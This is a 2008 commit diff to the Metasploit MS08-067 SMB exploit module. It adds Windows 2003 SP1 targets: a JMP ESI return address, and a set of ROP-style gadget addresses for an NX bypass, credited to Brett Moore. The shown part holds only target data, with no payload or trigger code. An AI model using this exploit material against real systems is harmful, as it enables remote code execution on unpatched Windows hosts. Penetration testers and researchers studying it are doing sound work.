Adds Windows 2003 SP1 (NO NX and NX(is this needed)).

git-svn-id: file:///home/svn/framework3/trunk@5813 4d416f70-5f16-0410-b530-b9f4589650da
2008-10-31 05:55:57 +00:00 · 2008-10-31 05:55:57 +00:00 · e784bcd515
parent 7fcf5b3dc2
commit e784bcd515
1 changed files with 25 additions and 3 deletions
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@ -153,6 +153,16 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					], # JMP ESI WS2HELP.DLL

+					#
+					# Standard return-to-ESI without NX bypass
+					#
+					[ 'Windows 2003 SP1 English (NO NX)',
+						{
+							'Ret'       => 0x71bf21a2, 
+							'Scratch'   => 0x00020408,
+						}
+					], # JMP ESI WS2HELP.DLL
+										
 					#
 					# Standard return-to-ESI without NX bypass
 					#
@ -163,6 +173,19 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					], # JMP ESI WS2HELP.DLL

+					#
+					# Brett Moore's crafty NX bypass for 2003 SP1
+					#
+					[ 'Windows 2003 SP1 English (NX)',
+						{
+							'RetDec'    => 0x7c90568c,	# dec ESI, ret @SHELL32.DLL
+							'RetPop'    => 0x7ca27cf4, 	# push ESI, pop EBP, ret @SHELL32.DLL
+							'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
+							'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
+							'Scratch'   => 0x00020408,
+						}
+					],
+										
 					#
 					# Brett Moore's crafty NX bypass for 2003 SP2
 					#
@ -182,7 +205,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					#
 					# [?] Windows XP SP0    - Could not trigger with this vector
 					# [?] Windows XP SP1    - Could not trigger with this vector
-					# [?] Windows 2003 SP1  - Could not trigger with this vector
 					# [?] Windows Vista SP0 - Not tested yet
 					# [?] Windows Vista SP1 - Not tested yet
 					#